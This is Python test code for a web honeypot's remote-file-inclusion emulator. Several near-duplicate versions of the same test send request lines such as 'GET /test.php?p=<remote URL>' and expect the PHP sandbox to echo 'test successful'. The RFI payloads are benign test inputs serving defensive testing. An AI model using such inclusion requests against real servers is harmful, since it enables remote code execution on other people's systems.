def test_rfi_emulator_with_malformed_uri(self):
    """Run the "rfi" emulator on an event built from a raw request line.

    Objective: Remote File Injection test with malformed uri.
    Input: GET /test.php?p=http://1durch0.de/test_file.txt HTTP/1.0
    Expected Result: event.http_request.get_response() equals
        "test successful", i.e. the return value from the PHP sandbox.
    Notes: The injected file is expected to contain
        <?php echo("test successful"); ?>
    """
    # TODO: Handle return value from sandbox
    # NOTE(review): despite the test name, the request line below contains
    # no stray quote or other malformation -- confirm the intended input.
    # NOTE(review): the included URL is a live third-party host; presumably
    # the emulator fetches it, so the result (and what reaches the PHP
    # sandbox) depends on what that host serves at run time -- confirm.
    GlastopfHoneypot.prepare_sandbox(self.work_dir)
    print("Starting remote file inclusion test")

    request_line = 'GET /test.php?p=http://1durch0.de/test_file.txt HTTP/1.0'
    event = attack.AttackEvent()
    event.http_request = HTTPHandler(request_line, None)
    event.matched_pattern = "rfi"

    helpers.create_sandbox(self.data_dir)
    dispatcher = RequestHandler(self.data_dir)
    rfi_emulator = dispatcher.get_handler(event.matched_pattern)

    target = "http://localhost:8080" + event.http_request.path
    print(" ".join(["Sending request:", target]))
    rfi_emulator.handle(event)

    response = event.http_request.get_response()
    self.assertEqual(response, "test successful")
    print("Return value 'test successful', matching our expectation.")
def test_rfi_emulator(self):
    """Run the "rfi" emulator on self.event and check its response.

    Objective: Remote File Injection test.
    Input: /test.php?p=http://1durch0.de/test_file.txt, set as the url
        of a fresh util.HTTPRequest on self.event.
    Expected Result: self.event.response equals "test successful",
        i.e. the return value from the PHP sandbox.
    Notes: The injected file is expected to contain
        <?php echo("test successful"); ?>
    """
    # TODO: Handle return value from sandbox
    # NOTE(review): the included URL is a live third-party host; presumably
    # the emulator fetches it, so the result (and what reaches the PHP
    # sandbox) depends on what that host serves at run time -- confirm.
    GlastopfHoneypot.prepare_sandbox(self.work_dir)
    print("Starting remote file inclusion test")

    self.event.parsed_request = util.HTTPRequest()
    self.event.parsed_request.url = "/test.php?p=http://1durch0.de/test_file.txt"
    target = "http://localhost:8080" + self.event.parsed_request.url
    print(" ".join(["Sending request:", target]))

    self.event.matched_pattern = "rfi"
    # Start from an empty response so the assertion only sees emulator output.
    self.event.response = ""

    helpers.create_sandbox(self.data_dir)
    dispatcher = RequestHandler(self.data_dir)
    rfi_emulator = dispatcher.get_handler(self.event.matched_pattern)
    rfi_emulator.handle(self.event)

    self.assertEqual(self.event.response, "test successful")
    print("Return value 'test successful', matching our expectation.")
def test_rfi_emulator_with_malformed_uri(self):
    """Run the "rfi" emulator on an event built from a raw request line.

    Objective: Remote File Injection test with malformed uri.
    Input: GET /test.php?p=<gist raw URL of test_file.txt> HTTP/1.0
    Expected Result: event.http_request.get_response() equals
        "test successful", i.e. the return value from the PHP sandbox.
    Notes: The injected file is expected to contain
        <?php echo("test successful"); ?>
    """
    # TODO: Handle return value from sandbox
    # NOTE(review): despite the test name, the request line below contains
    # no stray quote or other malformation -- confirm the intended input.
    GlastopfHoneypot.prepare_sandbox(self.work_dir)
    print("Starting remote file inclusion test")

    # NOTE(review): the raw gist path carries a revision hash, so the
    # included content is presumably fixed; the test still appears to need
    # outbound network access -- confirm.
    remote_file = "https://gist.githubusercontent.com/glaslos/02c4c4be39fb03b3bbee5c862cd304c6/raw/adf146469e8eeee4498874164ecd80c70ffb4e7a/test_file.txt"
    request_line = 'GET /test.php?p={} HTTP/1.0'.format(remote_file)

    event = attack.AttackEvent()
    event.http_request = HTTPHandler(request_line, None)
    event.matched_pattern = "rfi"

    helpers.create_sandbox(self.data_dir)
    dispatcher = RequestHandler(self.data_dir)
    rfi_emulator = dispatcher.get_handler(event.matched_pattern)

    target = "http://localhost:8080" + event.http_request.path
    print(" ".join(["Sending request:", target]))
    rfi_emulator.handle(event)

    response = event.http_request.get_response()
    self.assertEqual(response, "test successful")
    print("Return value 'test successful', matching our expectation.")
def test_rfi_emulator_with_malformed_uri(self):
    """Check that the "rfi" handler answers with the sandbox output.

    Objective: Remote File Injection test with malformed uri.
    Input: a GET request line for /test.php whose p parameter is the
        raw gist URL of test_file.txt, sent as HTTP/1.0.
    Expected Result: the request's get_response() returns
        "test successful", i.e. the return value from the PHP sandbox.
    Notes: The injected file is expected to contain
        <?php echo("test successful"); ?>
    """
    # TODO: Handle return value from sandbox
    # NOTE(review): the test name mentions a malformed uri, yet the request
    # built here has no visible malformation -- confirm the intended input.
    GlastopfHoneypot.prepare_sandbox(self.work_dir)
    print("Starting remote file inclusion test")

    event = attack.AttackEvent()
    # NOTE(review): this raw gist path includes a revision hash, which
    # presumably pins the included content; running the test still seems
    # to require outbound network access -- confirm.
    payload_url = "https://gist.githubusercontent.com/glaslos/02c4c4be39fb03b3bbee5c862cd304c6/raw/adf146469e8eeee4498874164ecd80c70ffb4e7a/test_file.txt"
    event.http_request = HTTPHandler('GET /test.php?p={} HTTP/1.0'.format(payload_url), None)
    event.matched_pattern = "rfi"

    helpers.create_sandbox(self.data_dir)
    handler = RequestHandler(self.data_dir).get_handler(event.matched_pattern)

    announced = "http://localhost:8080" + event.http_request.path
    print(" ".join(("Sending request:", announced)))
    handler.handle(event)

    self.assertEqual(event.http_request.get_response(), "test successful")
    print("Return value 'test successful', matching our expectation.")